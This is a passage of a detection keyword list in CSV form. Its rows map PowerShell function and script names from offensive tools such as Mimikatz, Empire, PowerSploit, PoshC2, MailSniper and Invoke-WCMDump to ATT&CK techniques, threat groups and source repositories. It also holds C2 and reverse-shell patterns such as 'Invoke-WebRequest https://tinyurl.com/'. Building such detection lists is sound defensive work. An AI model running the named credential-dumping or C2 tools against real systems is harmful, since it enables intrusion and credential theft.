TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z 
-*Invoke-UacCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UdpEndpointsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UnattendFilesCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-UnattendFilesCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UpdateMimikatzScript.ps1*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/g4uss47/Invoke-Mimikatz,1,1,N/A,10,1,23,6,2023-03-02T22:59:52Z,2020-09-22T16:47:19Z -*Invoke-UrbanBishop*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*invoke-urlcheck -urls*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-UserCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UserEnvCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege 
Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UserGroupsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UserHunter -CheckAccess*,greyware_tool_keyword,powershell,Check local admin access for the current user where the targets are found,T1078.003 - T1046 - T1087.001,TA0002 - TA0007 - TA0040,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*invokeuserhunter*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-UserHunter*,offensive_tool_keyword,cobaltstrike,PowerView menu 
for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-UserHunter*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-UserHunter*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*invoke-userhunter*,offensive_tool_keyword,pywerview,A partial Python rewriting of PowerSploit PowerView,T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/the-useless-one/pywerview,1,1,N/A,N/A,8,738,102,2023-10-02T14:57:20Z,2016-07-06T13:25:09Z -*Invoke-UserImpersonation*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - 
Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-UsernameHarvestEAS*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-UsernameHarvestGmail*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-UsernameHarvestOWA*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-UserPrivilegesCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-UserPrivilegesCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UserRestrictedSidsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UserSessionListCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-UsersHomeFolderCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-VaultCredCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to 
automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-VaultCredCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-VaultListCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Vnc*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-Vnc.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Vnc.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1087,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-VNCServer.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-VNCViewer.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-VoiceTroll.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1073,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Vulmap*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-VulnerableADCSTemplates*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-watson*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-WCMDump*,offensive_tool_keyword,Invoke-WCMDump,PowerShell script to dump Windows credentials from the Credential Manager Invoke-WCMDump enumerates Windows credentials in the Credential Manager and then extracts available information about each one. Passwords are retrieved for Generic type credentials. but can not be retrived by the same method for Domain type credentials. 
Credentials are only returned for the current user,T1003 - T1003.003 - T1003.001 - T1552,TA0006 - TA0006 - TA0006 - TA0006,N/A,N/A,Credential Access,https://github.com/peewpw/Invoke-WCMDump,1,1,N/A,N/A,8,708,132,2017-12-12T00:46:33Z,2017-12-09T21:36:59Z -*Invoke-WCMDump*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-WebRequest https://tinyurl.com/*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*Invoke-WebRequest ifconfig.me/ip*Content.Trim(),greyware_tool_keyword,powershell,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*Invoke-WebRev.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-Whisker*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z 
-*Invoke-WindowsUpdateCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-WinEnum*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-WinEnum.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-WinEnum.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1145,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-WinlogonCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - 